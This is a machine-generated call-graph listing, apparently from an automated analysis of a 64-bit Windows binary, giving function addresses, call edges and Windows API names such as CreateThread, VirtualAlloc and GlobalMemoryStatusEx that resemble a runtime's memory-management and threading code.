16342->16343 16344 7ff67dcb9c10 9 API calls 16343->16344 16345 7ff67dcc3ad0 16344->16345 16346 7ff67dcb9c10 9 API calls 16345->16346 16347 7ff67dcc3af0 16346->16347 16456 7ff67dcb9dd0 16347->16456 16350 7ff67dcb9dd0 9 API calls 16351 7ff67dcc3b20 16350->16351 16352 7ff67dcb9dd0 9 API calls 16351->16352 16353 7ff67dcc3b35 16352->16353 16354 7ff67dcb9dd0 9 API calls 16353->16354 16355 7ff67dcc3b4a 16354->16355 16356 7ff67dcb9dd0 9 API calls 16355->16356 16357 7ff67dcc3b5f 16356->16357 16358 7ff67dcb9dd0 9 API calls 16357->16358 16359 7ff67dcc3b79 16358->16359 16360 7ff67dcb9dd0 9 API calls 16359->16360 16361 7ff67dcc3b8e 16360->16361 16362 7ff67dcb9dd0 9 API calls 16361->16362 16363 7ff67dcc3ba3 16362->16363 16364 7ff67dcb9dd0 9 API calls 16363->16364 16365 7ff67dcc3bb8 16364->16365 16366 7ff67dcb9dd0 9 API calls 16365->16366 16367 7ff67dcc3bcd 16366->16367 16368 7ff67dcb9dd0 9 API calls 16367->16368 16369 7ff67dcc3be2 16368->16369 16370 7ff67dcb9dd0 9 API calls 16369->16370 16371 7ff67dcc3bf7 16370->16371 16372 7ff67dcb9dd0 9 API calls 16371->16372 16373 7ff67dcc3c11 16372->16373 16374 7ff67dcb9dd0 9 API calls 16373->16374 16375 7ff67dcc3c2b 16374->16375 16376 7ff67dcb9dd0 9 API calls 16375->16376 16377 7ff67dcc3c40 16376->16377 16378 7ff67dcb9dd0 9 API calls 16377->16378 16379 7ff67dcc3c55 16378->16379 16380 7ff67dcb9dd0 9 API calls 16379->16380 16381 7ff67dcc3c6a 16380->16381 16382 7ff67dcb9dd0 9 API calls 16381->16382 16383 7ff67dcc3c7f 16382->16383 16384 7ff67dcb9dd0 9 API calls 16383->16384 16385 7ff67dcc3c99 16384->16385 16386 7ff67dcb9dd0 9 API calls 16385->16386 16387 7ff67dcc3cb3 16386->16387 16388 7ff67dcb9dd0 9 API calls 16387->16388 16389 7ff67dcc3cc8 16388->16389 16390 7ff67dcb9dd0 9 API calls 16389->16390 16391 7ff67dcc3cdd 16390->16391 16392 7ff67dcb9dd0 9 API calls 16391->16392 16393 7ff67dcc3cf2 16392->16393 16394 7ff67dcb9dd0 9 API calls 16393->16394 16395 7ff67dcc3d07 16394->16395 16396 7ff67dcb9dd0 9 API calls 16395->16396 16397 7ff67dcc3d1c 16396->16397 16398 7ff67dcb9dd0 9 API calls 16397->16398 16399 7ff67dcc3d31 16398->16399 16400 7ff67dcb9dd0 9 API calls 16399->16400 16401 7ff67dcc3d46 16400->16401 16402 7ff67dcb9dd0 9 API calls 16401->16402 16403 7ff67dcc3d5b 16402->16403 16404 7ff67dcb9dd0 9 API calls 16403->16404 16405 7ff67dcc3d70 16404->16405 16406 7ff67dcb9dd0 9 API calls 16405->16406 16407 7ff67dcc3d85 16406->16407 16408 7ff67dcb9dd0 9 API calls 16407->16408 16409 7ff67dcc3d9a 16408->16409 16410 7ff67dcb9dd0 9 API calls 16409->16410 16411 7ff67dcc3daf 16410->16411 16412 7ff67dcb9dd0 9 API calls 16411->16412 16413 7ff67dcc3dc4 16412->16413 16414 7ff67dcb9dd0 9 API calls 16413->16414 16415 7ff67dcc3dd9 16414->16415 16416 7ff67dcb9dd0 9 API calls 16415->16416 16417 7ff67dcc3dee 16416->16417 16418 7ff67dcb9dd0 9 API calls 16417->16418 16419 7ff67dcc3e03 16418->16419 16420 7ff67dcb9dd0 9 API calls 16419->16420 16421 7ff67dcc3e18 16420->16421 16422 7ff67dcb9dd0 9 API calls 16421->16422 16423 7ff67dcc3e2d 16422->16423 16424 7ff67dcb9dd0 9 API calls 16423->16424 16425 7ff67dcc3e42 16424->16425 16426 7ff67dcb9dd0 9 API calls 16425->16426 16427 7ff67dcc3e57 16426->16427 16428 7ff67dcb9dd0 9 API calls 16427->16428 16429 7ff67dcc3e6c 16428->16429 16430 7ff67dcb9dd0 9 API calls 16429->16430 16431 7ff67dcc3e81 16430->16431 16432 7ff67dcb9dd0 9 API calls 16431->16432 16433 7ff67dcc3e96 16432->16433 16434 7ff67dcb9dd0 9 API calls 16433->16434 16435 7ff67dcc3eb0 16434->16435 16436 7ff67dcb9dd0 9 API calls 16435->16436 16437 7ff67dcc3eca 16436->16437 16438 7ff67dcb9dd0 9 API calls 16437->16438 16439 7ff67dcc3ee4 16438->16439 16440 7ff67dcb9dd0 9 API calls 16439->16440 16441 7ff67dcc3efe 16440->16441 16442 7ff67dcb9dd0 9 API calls 16441->16442 16443 7ff67dcc3f18 16442->16443 16444 7ff67dcb9dd0 9 API calls 16443->16444 16445 7ff67dcc3f32 16444->16445 16446 7ff67dcb9dd0 9 API calls 16445->16446 16447 7ff67dcc3f47 16446->16447 16448 7ff67dcb9dd0 9 API calls 16447->16448 16449 7ff67dcc3f61 16448->16449 16451 7ff67dcb9c43 16450->16451 16452 7ff67dcb9c47 16451->16452 16455 7ff67dcbd830 9 API calls 16451->16455 16453 7ff67dd19030 8 API calls 16452->16453 16454 7ff67dcb9d7e 16453->16454 16454->16326 16455->16452 16457 7ff67dcb9e00 16456->16457 16457->16457 16458 7ff67dcbd830 9 API calls 16457->16458 16459 7ff67dcb9f18 16458->16459 16460 7ff67dd19030 8 API calls 16459->16460 16461 7ff67dcb9f30 16460->16461 16461->16350 16468 7ff67dd18f4c 16462->16468 16465 7ff67dcbfe40 16466 7ff67dcbb490 InitializeCriticalSectionEx 16465->16466 16467 7ff67dcbfe8c 16466->16467 16467->16266 16469 7ff67dd18f66 malloc 16468->16469 16470 7ff67dd18f57 16469->16470 16471 7ff67dcb71a5 16469->16471 16470->16469 16472 7ff67dd18f76 16470->16472 16471->16264 16471->16465 16475 7ff67dd18f81 16472->16475 16477 7ff67dd19aac 16472->16477 16481 7ff67dd19acc 16475->16481 16478 7ff67dd19aba std::bad_alloc::bad_alloc 16477->16478 16485 7ff67dd1a960 16478->16485 16480 7ff67dd19acb 16482 7ff67dd19ada std::bad_alloc::bad_alloc 16481->16482 16483 7ff67dd1a960 Concurrency::cancel_current_task 2 API calls 16482->16483 16484 7ff67dd18f87 16483->16484 16486 7ff67dd1a97f 16485->16486 16487 7ff67dd1a9a8 RtlPcToFileHeader 16486->16487 16488 7ff67dd1a9ca RaiseException 16486->16488 16489 7ff67dd1a9c0 16487->16489 16488->16480 16489->16488 16491 7ff67dd19050 _swprintf_c_l 3 API calls 16490->16491 16492 7ff67dcb4dfe 16491->16492 16493 7ff67dcb4e30 16492->16493 16494 7ff67dcbb490 InitializeCriticalSectionEx 16492->16494 16496 7ff67dcb4e88 ISource 16493->16496 16504 7ff67dcbb470 16493->16504 16494->16493 16496->16277 16498 7ff67dcb4ed5 16497->16498 16500 7ff67dcb4ee6 ISource 16497->16500 16499 7ff67dcbb470 DeleteCriticalSection 16498->16499 16499->16500 16500->16280 16502 7ff67dcbb470 16501->16502 16502->16282 16503 7ff67dd18ab5 DeleteCriticalSection 16502->16503 16504->16496 16505 7ff67dd18ab5 DeleteCriticalSection 16504->16505 16541 7ff67dcc1de0 16506->16541 16508 7ff67dcba0b7 16508->16299 16509 7ff67dcc91c0 16508->16509 16552 7ff67dcbe0a0 16509->16552 16513 7ff67dcc91de 16515 7ff67dcc9259 16513->16515 16559 7ff67dcc22e0 16513->16559 16523 7ff67dcc94cb ISource 16515->16523 16573 7ff67dcdf6c0 16515->16573 16517 7ff67dcc96cc 16518 7ff67dd19050 _swprintf_c_l 3 API calls 16517->16518 16517->16523 16519 7ff67dcc9802 16518->16519 16519->16523 16596 7ff67dcc1f30 16519->16596 16521 7ff67dcc982d 16601 7ff67dcddea0 16521->16601 16523->16300 16525 7ff67dcb69f2 16524->16525 16526 7ff67dcb6a2d 16525->16526 16743 7ff67dcbfcf0 CreateEventW 16525->16743 16526->16302 16528 7ff67dcb6a04 16528->16526 16744 7ff67dcbb3a0 CreateThread 16528->16744 16530 7ff67dcb6a23 16530->16302 16532 7ff67dcbea67 16531->16532 16533 7ff67dcbea6f 16532->16533 16534 7ff67dd19050 _swprintf_c_l 3 API calls 16532->16534 16533->16303 16538 7ff67dcbeaa1 16534->16538 16535 7ff67dcbebd8 ISource 16535->16303 16537 7ff67dcbeb72 ISource 16537->16303 16538->16535 16539 7ff67dcbeb35 ISource 16538->16539 16747 7ff67dcc43d0 16538->16747 16539->16537 16753 7ff67dcc4660 16539->16753 16546 7ff67dcc4ca0 16541->16546 16545 7ff67dcc1e1f 16545->16508 16547 7ff67dd19050 _swprintf_c_l 3 API calls 16546->16547 16548 7ff67dcc1e08 16547->16548 16548->16545 16549 7ff67dcc67f0 16548->16549 16550 7ff67dd19050 _swprintf_c_l 3 API calls 16549->16550 16551 7ff67dcc6805 16550->16551 16551->16545 16553 7ff67dcbe14c 16552->16553 16555 7ff67dcbe0db 16552->16555 16558 7ff67dcc2920 QueryPerformanceFrequency 16553->16558 16555->16553 16557 7ff67dcbe114 16555->16557 16624 7ff67dcbddc0 16555->16624 16557->16553 16632 7ff67dcbe160 16557->16632 16558->16513 16560 7ff67dcc2303 16559->16560 16561 7ff67dcc2454 16560->16561 16562 7ff67dcc2317 GetCurrentProcess IsProcessInJob 16560->16562 16565 7ff67dcc24a2 GlobalMemoryStatusEx 16561->16565 16566 7ff67dcc2498 16561->16566 16563 7ff67dcc2413 16562->16563 16564 7ff67dcc236c 16562->16564 16563->16561 16568 7ff67dcc242b GlobalMemoryStatusEx 16563->16568 16564->16563 16567 7ff67dcc2376 QueryInformationJobObject 16564->16567 16565->16566 16570 7ff67dd19030 8 API calls 16566->16570 16567->16563 16569 7ff67dcc2398 16567->16569 16568->16561 16569->16563 16572 7ff67dcc23dc GlobalMemoryStatusEx 16569->16572 16571 7ff67dcc24e4 16570->16571 16571->16515 16572->16563 16641 7ff67dcc2970 VirtualAlloc 16573->16641 16575 7ff67dcdf6e2 16576 7ff67dcdf747 16575->16576 16703 7ff67dcc2710 InitializeCriticalSection 16575->16703 16578 7ff67dcdfb3d 16576->16578 16644 7ff67dcf0490 16576->16644 16580 7ff67dcdf771 _swprintf_c_l 16595 7ff67dcdf9b3 16580->16595 16654 7ff67dcdf3c0 16580->16654 16582 7ff67dcdf948 16658 7ff67dcdce90 16582->16658 16586 7ff67dcdf982 16587 7ff67dcdfb60 18 API calls 16586->16587 16586->16595 16588 7ff67dcdf9a4 16587->16588 16589 7ff67dcdf9a8 16588->16589 16591 7ff67dcdf9d7 16588->16591 16704 7ff67dcc2a60 VirtualFree 16589->16704 16591->16595 16665 7ff67dcf3120 16591->16665 16595->16517 16597 7ff67dd19050 _swprintf_c_l 3 API calls 16596->16597 16598 7ff67dcc1f56 16597->16598 16599 7ff67dcc1f5e CreateEventW 16598->16599 16600 7ff67dcc1f80 ISource 16598->16600 16599->16600 16600->16521 16602 7ff67dcddf2a _swprintf_c_l 16601->16602 16603 7ff67dcc1f30 4 API calls 16602->16603 16604 7ff67dcddf38 16603->16604 16605 7ff67dcde797 16604->16605 16741 7ff67dcc2900 QueryPerformanceCounter 16604->16741 16605->16523 16607 7ff67dce16e0 9 API calls 16608 7ff67dcddf56 16607->16608 16608->16605 16608->16607 16609 7ff67dcde2c6 16608->16609 16610 7ff67dce16e0 9 API calls 16609->16610 16611 7ff67dcde2f9 16610->16611 16611->16605 16612 7ff67dce16e0 9 API calls 16611->16612 16613 7ff67dcde338 16612->16613 16613->16605 16614 7ff67dd19050 _swprintf_c_l 3 API calls 16613->16614 16615 7ff67dcde601 16614->16615 16615->16605 16616 7ff67dcde664 16615->16616 16617 7ff67dcde64d 16615->16617 16618 7ff67dd19050 _swprintf_c_l 3 API calls 16616->16618 16617->16605 16619 7ff67dcde65a DebugBreak 16617->16619 16620 7ff67dcde6b0 16618->16620 16619->16605 16620->16605 16621 7ff67dd19050 _swprintf_c_l 3 API calls 16620->16621 16622 7ff67dcde73d 16621->16622 16622->16605 16742 7ff67dcc2710 InitializeCriticalSection 16622->16742 16628 7ff67dcbdde4 16624->16628 16625 7ff67dd19050 _swprintf_c_l 3 API calls 16626 7ff67dcbde4d 16625->16626 16627 7ff67dd19050 _swprintf_c_l 3 API calls 16626->16627 16631 7ff67dcbdf05 ISource 16626->16631 16629 7ff67dcbde78 16627->16629 16628->16625 16628->16629 16629->16631 16636 7ff67dcbaf20 GetCurrentThreadId 16629->16636 16631->16557 16633 7ff67dcbe1b5 16632->16633 16635 7ff67dcbe1bc 16632->16635 16637 7ff67dcbdbf0 16633->16637 16635->16553 16636->16631 16638 7ff67dcbdc1a _swprintf_c_l 16637->16638 16639 7ff67dd19050 _swprintf_c_l 3 API calls 16638->16639 16640 7ff67dcbdc41 16638->16640 16639->16640 16640->16635 16642 7ff67dcc2991 VirtualFree 16641->16642 16643 7ff67dcc29a9 16641->16643 16642->16575 16643->16575 16645 7ff67dcf04bf 16644->16645 16646 7ff67dcf04e2 16645->16646 16647 7ff67dcf04ec 16645->16647 16652 7ff67dcf0517 16645->16652 16705 7ff67dcc2b00 16646->16705 16649 7ff67dcc2a80 3 API calls 16647->16649 16651 7ff67dcf04fd 16649->16651 16651->16652 16716 7ff67dcc2a60 VirtualFree 16651->16716 16652->16580 16656 7ff67dcdf3df 16654->16656 16657 7ff67dcdf3fc 16656->16657 16717 7ff67dcc1ff0 16656->16717 16657->16582 16659 7ff67dcdceb2 16658->16659 16660 7ff67dd19030 8 API calls 16659->16660 16661 7ff67dcdcfd3 16660->16661 16662 7ff67dcc2a80 16661->16662 16663 7ff67dcc2aa5 VirtualAlloc 16662->16663 16664 7ff67dcc2ac4 GetCurrentProcess VirtualAllocExNuma 16662->16664 16663->16664 16664->16586 16724 7ff67dcf3030 16665->16724 16668 7ff67dcded80 16675 7ff67dcdedb0 16668->16675 16669 7ff67dcdf391 16739 7ff67dcc1e90 CloseHandle 16669->16739 16670 7ff67dcdf39d 16671 7ff67dcdf3b2 16670->16671 16672 7ff67dcdf3a6 16670->16672 16671->16595 16740 7ff67dcc1e90 CloseHandle 16672->16740 16676 7ff67dcc1f30 4 API calls 16675->16676 16701 7ff67dcdee0f 16675->16701 16677 7ff67dcdee4f 16676->16677 16678 7ff67dcc1f30 4 API calls 16677->16678 16677->16701 16679 7ff67dcdee65 _swprintf_c_l 16678->16679 16680 7ff67dcc2100 10 API calls 16679->16680 16679->16701 16681 7ff67dcdf18a 16680->16681 16682 7ff67dcc1f30 4 API calls 16681->16682 16683 7ff67dcdf207 16682->16683 16684 7ff67dcdf249 16683->16684 16687 7ff67dcc1f30 4 API calls 16683->16687 16685 7ff67dcdf33d 16684->16685 16686 7ff67dcdf349 16684->16686 16684->16701 16735 7ff67dcc1e90 CloseHandle 16685->16735 16689 7ff67dcdf352 16686->16689 16690 7ff67dcdf35e 16686->16690 16691 7ff67dcdf21d 16687->16691 16736 7ff67dcc1e90 CloseHandle 16689->16736 16693 7ff67dcdf373 16690->16693 16694 7ff67dcdf367 16690->16694 16691->16684 16730 7ff67dcc1eb0 16691->16730 16696 7ff67dcdf37c 16693->16696 16693->16701 16737 7ff67dcc1e90 CloseHandle 16694->16737 16738 7ff67dcc1e90 CloseHandle 16696->16738 16699 7ff67dcdf233 16699->16684 16700 7ff67dcc1f30 4 API calls 16699->16700 16700->16684 16701->16669 16701->16670 16702 7ff67dcdf2f7 16701->16702 16702->16595 16703->16576 16704->16595 16706 7ff67dcc2b2e LookupPrivilegeValueW 16705->16706 16707 7ff67dcc2bc6 GetLargePageMinimum 16705->16707 16710 7ff67dcc2bff 16706->16710 16711 7ff67dcc2b4a GetCurrentProcess OpenProcessToken 16706->16711 16708 7ff67dcc2c03 GetCurrentProcess VirtualAllocExNuma 16707->16708 16709 7ff67dcc2be6 VirtualAlloc 16707->16709 16708->16710 16709->16710 16714 7ff67dd19030 8 API calls 16710->16714 16711->16710 16712 7ff67dcc2b81 AdjustTokenPrivileges GetLastError CloseHandle 16711->16712 16712->16710 16713 7ff67dcc2bbb 16712->16713 16713->16707 16713->16710 16715 7ff67dcc2c36 16714->16715 16715->16651 16716->16652 16718 7ff67dcc1ff8 16717->16718 16719 7ff67dcc2011 GetLogicalProcessorInformation 16718->16719 16723 7ff67dcc203d ISource 16718->16723 16720 7ff67dcc2044 16719->16720 16721 7ff67dcc2032 GetLastError 16719->16721 16722 7ff67dcc2081 GetLogicalProcessorInformation 16720->16722 16720->16723 16721->16720 16721->16723 16722->16723 16723->16657 16725 7ff67dcf3049 16724->16725 16728 7ff67dcdfb1c 16724->16728 16726 7ff67dcf3064 LoadLibraryExW 16725->16726 16725->16728 16727 7ff67dcf3092 GetProcAddress 16726->16727 16726->16728 16729 7ff67dcf30a7 16727->16729 16728->16668 16729->16728 16731 7ff67dd19050 _swprintf_c_l 3 API calls 16730->16731 16732 7ff67dcc1ed6 16731->16732 16733 7ff67dcc1ede CreateEventW 16732->16733 16734 7ff67dcc1efe ISource 16732->16734 16733->16734 16734->16699 16735->16686 16736->16690 16737->16693 16738->16701 16739->16670 16740->16671 16741->16608 16742->16605 16743->16528 16745 7ff67dcbb3cf 16744->16745 16746 7ff67dcbb3d5 SetThreadPriority ResumeThread CloseHandle 16744->16746 16745->16530 16746->16530 16749 7ff67dcc4403 _swprintf_c_l 16747->16749 16748 7ff67dcc4429 ISource _swprintf_c_l 16748->16538 16749->16748 16756 7ff67dcc5380 16749->16756 16751 7ff67dcc4420 16751->16748 16752 7ff67dcbb490 InitializeCriticalSectionEx 16751->16752 16752->16748 16754 7ff67dcbb470 DeleteCriticalSection 16753->16754 16755 7ff67dcc4672 16754->16755 16757 7ff67dcc2a80 3 API calls 16756->16757 16758 7ff67dcc53a2 16757->16758 16759 7ff67dcc53aa 16758->16759 16760 7ff67dcc29b0 3 API calls 16758->16760 16759->16751 16761 7ff67dcc53c8 16760->16761 16764 7ff67dcc53d3 _swprintf_c_l 16761->16764 16765 7ff67dcc2a60 VirtualFree 16761->16765 16763 7ff67dcc54ee 16763->16751 16764->16751 16765->16763 16767 7ff67dcbb26e GetProcAddress 16766->16767 16768 7ff67dcbb283 16766->16768 16767->16768 16768->16318 16770 7ff67dcbb21e GetProcAddress 16769->16770 16771 7ff67dcbb233 16769->16771 16770->16771 16771->16320 16773 7ff67dcbb2b4 16772->16773 16773->16773 16774 7ff67dcbb2bd GetStdHandle WriteFile 16773->16774 16774->16315 16775 7ff67dcc8682 16776 7ff67dcc8688 16775->16776 16799 7ff67dcd94a0 16776->16799 16779 7ff67dcc86c4 16803 7ff67dcc2900 QueryPerformanceCounter 16779->16803 16782 7ff67dcc86e2 16804 7ff67dcba550 16782->16804 16785 7ff67dcc8825 16791 7ff67dcc8745 16785->16791 16820 7ff67dcda1d0 16785->16820 16788 7ff67dcc886a 16788->16791 16841 7ff67dcdd9d0 16788->16841 16790 7ff67dcc8a50 16792 7ff67dcd94a0 SwitchToThread 16790->16792 16791->16790 16796 7ff67dcc89d4 16791->16796 16849 7ff67dcc2900 QueryPerformanceCounter 16791->16849 16795 7ff67dcc8a5b 16792->16795 16798 7ff67dcc8a7e 16795->16798 16858 7ff67dcc2950 SetEvent 16795->16858 16850 7ff67dcba1f0 16796->16850 16800 7ff67dcc86a6 16799->16800 16802 7ff67dcd94bf 16799->16802 16800->16779 16814 7ff67dcc2940 ResetEvent 16800->16814 16801 7ff67dcd9501 SwitchToThread 16801->16802 16802->16800 16802->16801 16803->16782 16805 7ff67dcba565 16804->16805 16809 7ff67dcba5c8 16805->16809 16867 7ff67dcbae80 EventEnabled 16805->16867 16807 7ff67dcba59f 16807->16809 16868 7ff67dcba710 EventWrite 16807->16868 16859 7ff67dcb51c0 16809->16859 16812 7ff67dcba61c 16812->16785 16812->16791 16815 7ff67dcd96d0 16812->16815 16817 7ff67dcd96f0 16815->16817 16816 7ff67dcdd9d0 11 API calls 16816->16817 16817->16816 16818 7ff67dcd975a 16817->16818 16819 7ff67dcdd280 38 API calls 16817->16819 16818->16785 16819->16817 16824 7ff67dcda1e5 16820->16824 16821 7ff67dcda2cd 16822 7ff67dccd290 24 API calls 16821->16822 16827 7ff67dcda2df 16822->16827 16823 7ff67dcda2e4 16825 7ff67dcde820 2 API calls 16823->16825 16824->16821 16824->16823 16838 7ff67dcda1e9 16824->16838 16826 7ff67dcda30a 16825->16826 16826->16827 16828 7ff67dcda321 EnterCriticalSection LeaveCriticalSection 16826->16828 16829 7ff67dcd3f90 7 API calls 16827->16829 16832 7ff67dcda380 16827->16832 16827->16838 16828->16827 16831 7ff67dcda366 16829->16831 16830 7ff67dcda428 DebugBreak 16834 7ff67dcda437 16830->16834 16831->16832 16833 7ff67dcda36a 16831->16833 16832->16830 16835 7ff67dcda3eb DebugBreak 16832->16835 16837 7ff67dcda408 DebugBreak 16832->16837 16840 7ff67dcda41f 16832->16840 16836 7ff67dcd6710 5 API calls 16833->16836 16834->16838 16839 7ff67dcda44b DebugBreak 16834->16839 16835->16832 16836->16838 16837->16832 16838->16788 16839->16838 16840->16830 16840->16834 16843 7ff67dcdd9e6 16841->16843 16842 7ff67dcdda17 16842->16791 16843->16842 16844 7ff67dcdda80 16843->16844 16845 7ff67dcbe0a0 4 API calls 16843->16845 16886 7ff67dcf0550 16844->16886 16845->16844 16848 7ff67dcbe0a0 4 API calls 16848->16842 16849->16796 16851 7ff67dcba1fd 16850->16851 16855 7ff67dcba22f 16850->16855 16897 7ff67dcbae80 EventEnabled 16851->16897 16853 7ff67dcba210 16853->16855 16898 7ff67dcba6c0 EventWrite 16853->16898 16857 7ff67dcba27e 16855->16857 16901 7ff67dcbae80 EventEnabled 16855->16901 16857->16790 16860 7ff67dcb51ff 16859->16860 16861 7ff67dcb5224 FlushProcessWriteBuffers 16860->16861 16862 7ff67dcb5250 16861->16862 16863 7ff67dcb5323 16862->16863 16864 7ff67dcb5289 16862->16864 16866 7ff67dcb52be SwitchToThread 16862->16866 16863->16812 16871 7ff67dcbae80 EventEnabled 16863->16871 16864->16862 16872 7ff67dcb5f20 16864->16872 16866->16862 16867->16807 16869 7ff67dd19030 8 API calls 16868->16869 16870 7ff67dcba77a 16869->16870 16870->16809 16871->16812 16873 7ff67dcb5f47 16872->16873 16874 7ff67dcb5f27 16872->16874 16873->16864 16874->16873 16875 7ff67dcbafa2 LoadLibraryExW GetProcAddress 16874->16875 16882 7ff67dcbafce 16874->16882 16875->16882 16876 7ff67dcbb02a SuspendThread 16877 7ff67dcbb078 16876->16877 16878 7ff67dcbb038 GetThreadContext 16876->16878 16881 7ff67dd19030 8 API calls 16877->16881 16879 7ff67dcbb06f ResumeThread 16878->16879 16880 7ff67dcbb052 16878->16880 16879->16877 16880->16879 16883 7ff67dcbb088 16881->16883 16882->16876 16882->16877 16884 7ff67dcbb014 GetLastError 16882->16884 16883->16864 16884->16877 16885 7ff67dcbb01f 16884->16885 16885->16876 16887 7ff67dcf0589 EnterCriticalSection 16886->16887 16888 7ff67dcf0615 16886->16888 16891 7ff67dcf05a9 LeaveCriticalSection 16887->16891 16889 7ff67dcc29b0 3 API calls 16888->16889 16894 7ff67dcddaa9 16888->16894 16892 7ff67dcf0646 16889->16892 16891->16888 16893 7ff67dcf0657 EnterCriticalSection 16892->16893 16892->16894 16895 7ff67dcf067d LeaveCriticalSection 16893->16895 16896 7ff67dcf0676 16893->16896 16894->16842 16894->16848 16895->16894 16896->16895 16897->16853 16899 7ff67dd19030 8 API calls 16898->16899 16900 7ff67dcba709 16899->16900 16900->16855 16901->16857 16902 7ff67dcb66a0 16909 7ff67dcb66c5 16902->16909 16903 7ff67dcb66d9 16904 7ff67dcb679f 16905 7ff67dcb67bf 16904->16905 16906 7ff67dcb67a6 16904->16906 16910 7ff67dcb67ef 16905->16910 16924 7ff67dcb6430 GetLastError 16905->16924 16908 7ff67dcbb2a0 2 API calls 16906->16908 16911 7ff67dcb67b2 RaiseFailFastException 16908->16911 16909->16903 16909->16904 16912 7ff67dcb6748 16909->16912 16915 7ff67dcb6786 16909->16915 16916 7ff67dcb6767 16909->16916 16911->16905 16914 7ff67dcb6750 Sleep 16912->16914 16914->16914 16914->16916 16918 7ff67dcb4cb0 16915->16918 16916->16915 16917 7ff67dcb6779 RaiseFailFastException 16916->16917 16917->16915 16919 7ff67dcb4cd6 16918->16919 16923 7ff67dcb4cf4 16919->16923 16927 7ff67dcbad40 FlsGetValue 16919->16927 16921 7ff67dcb4cec 16922 7ff67dcb59a0 6 API calls 16921->16922 16922->16923 16923->16904 16925 7ff67dcb6460 16924->16925 16926 7ff67dcb6486 SetLastError 16925->16926 16928 7ff67dcbad68 FlsSetValue 16927->16928 16929 7ff67dcbad5a RaiseFailFastException 16927->16929 16929->16928 16930 7ff67dcb9500 16931 7ff67dcb951f 16930->16931 16932 7ff67dcb9518 16930->16932 16946 7ff67dcb6320 16931->16946 16940 7ff67dcb4d40 16932->16940 16935 7ff67dcb953c 16955 7ff67dcbfd40 16935->16955 16937 7ff67dcb954c 16958 7ff67dcbe250 16937->16958 16941 7ff67dcb4d6d 16940->16941 16942 7ff67dcbad40 3 API calls 16941->16942 16945 7ff67dcb4d8b 16941->16945 16943 7ff67dcb4d83 16942->16943 16964 7ff67dcb59a0 16943->16964 16945->16931 16947 7ff67dcb6338 GetCurrentThreadId GetCurrentProcess GetCurrentThread DuplicateHandle 16946->16947 16948 7ff67dcb63e6 16946->16948 16949 7ff67dcbaab0 VirtualQuery 16947->16949 16948->16935 16950 7ff67dcb63ac 16949->16950 16951 7ff67dcb63c7 16950->16951 16952 7ff67dcb63ba RaiseFailFastException 16950->16952 16953 7ff67dcbdd40 4 API calls 16951->16953 16952->16951 16954 7ff67dcb63cf 16953->16954 16954->16935 16956 7ff67dcbfd51 SetEvent 16955->16956 16957 7ff67dcbfd4a 16955->16957 16956->16937 16957->16937 16960 7ff67dcbe2af _swprintf_c_l 16958->16960 16961 7ff67dcbe28a 16958->16961 16959 7ff67dcb9556 16960->16959 16963 7ff67dd19050 _swprintf_c_l 3 API calls 16960->16963 16961->16959 16962 7ff67dcbddc0 4 API calls 16961->16962 16962->16960 16963->16960 16965 7ff67dcb59cf 16964->16965 16972 7ff67dcbaab0 VirtualQuery 16965->16972 16968 7ff67dcb5a20 RaiseFailFastException 16969 7ff67dcb5a2d 16968->16969 16974 7ff67dcbdd40 16969->16974 16971 7ff67dcb5a35 16971->16945 16973 7ff67dcb5a1c 16972->16973 16973->16968 16973->16969 16975 7ff67dcbdd52 16974->16975 16976 7ff67dcbdd5a 16974->16976 16975->16971 16977 7ff67dcbddc0 4 API calls 16976->16977 16978 7ff67dcbdda5 16976->16978 16977->16978 16978->16971 16979 7ff67dcbfec0 16980 7ff67dcbfeda 16979->16980 16981 7ff67dcbfee5 16979->16981 16982 7ff67dcbff12 VirtualAlloc 16981->16982 16987 7ff67dcbff66 16981->16987 16983 7ff67dcbff4d 16982->16983 16982->16987 16984 7ff67dd19050 _swprintf_c_l 3 API calls 16983->16984 16985 7ff67dcbff5e 16984->16985 16986 7ff67dcbffb1 VirtualFree 16985->16986 16985->16987 16986->16987 16988 7ff67dcb9580 16989 7ff67dcb959f 16988->16989 16990 7ff67dcb95c2 16989->16990 17000 7ff67dcbb360 CreateThread 16989->17000 16992 7ff67dcb95b4 16993 7ff67dcb95c9 16992->16993 16994 7ff67dcb95bd 16992->16994 17007 7ff67dcbfd70 16993->17007 17003 7ff67dcbfc90 16994->17003 16997 7ff67dcb95d9 16998 7ff67dcbfc90 CloseHandle 16997->16998 16999 7ff67dcb95e3 16998->16999 17001 7ff67dcbb384 17000->17001 17002 7ff67dcbb389 CloseHandle 17000->17002 17001->16992 17002->16992 17004 7ff67dcbfc9f 17003->17004 17005 7ff67dcbfcb4 17003->17005 17004->17005 17006 7ff67dcbfca8 CloseHandle 17004->17006 17005->16990 17006->17005 17009 7ff67dcbfd9d 17007->17009 17013 7ff67dcbfdf7 17007->17013 17008 7ff67dcbfe1e 17010 7ff67dcbad80 4 API calls 17008->17010 17009->17008 17011 7ff67dcbfdd8 17009->17011 17010->17013 17014 7ff67dcbad80 17011->17014 17013->16997 17015 7ff67dcbada5 WaitForMultipleObjectsEx 17014->17015 17016 7ff67dcbadbc SetLastError CoWaitForMultipleHandles 17014->17016 17017 7ff67dcbadfe 17015->17017 17016->17017 17018 7ff67dcbadea 17016->17018 17017->17013 17018->17017 17019 7ff67dcbadee SetLastError 17018->17019 17019->17017 15935 7ff67dce07d0 15936 7ff67dce080d 15935->15936 15938 7ff67dce0837 15935->15938 15939 7ff67dcc2100 15936->15939 15940 7ff67dcc21ef GlobalMemoryStatusEx 15939->15940 15941 7ff67dcc2137 GetCurrentProcess 15939->15941 15944 7ff67dcc2158 15940->15944 15942 7ff67dcc2150 15941->15942 15942->15940 15942->15944 15946 7ff67dd19030 15944->15946 15947 7ff67dd19039 15946->15947 15948 7ff67dcc22c8 15947->15948 15949 7ff67dd19b3c IsProcessorFeaturePresent 15947->15949 15948->15938 15950 7ff67dd19b54 15949->15950 15955 7ff67dd19c10 RtlCaptureContext 15950->15955 15956 7ff67dd19c2a RtlLookupFunctionEntry 15955->15956 15957 7ff67dd19b67 15956->15957 15958 7ff67dd19c40 RtlVirtualUnwind 15956->15958 15959 7ff67dd19b08 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 15957->15959 15958->15956 15958->15957 17020 7ff67dccdfdb 17021 7ff67dceeb00 6 API calls 17020->17021 17022 7ff67dccdfb3 17021->17022 17022->17022 17023 7ff67dceeb00 6 API calls 17022->17023 17023->17022 17024 7ff67dccb198 17025 7ff67dccb19d 17024->17025 17026 7ff67dccb1f0 17024->17026 17027 7ff67dcee970 4 API calls 17025->17027 17028 7ff67dcdd9d0 11 API calls 17026->17028 17029 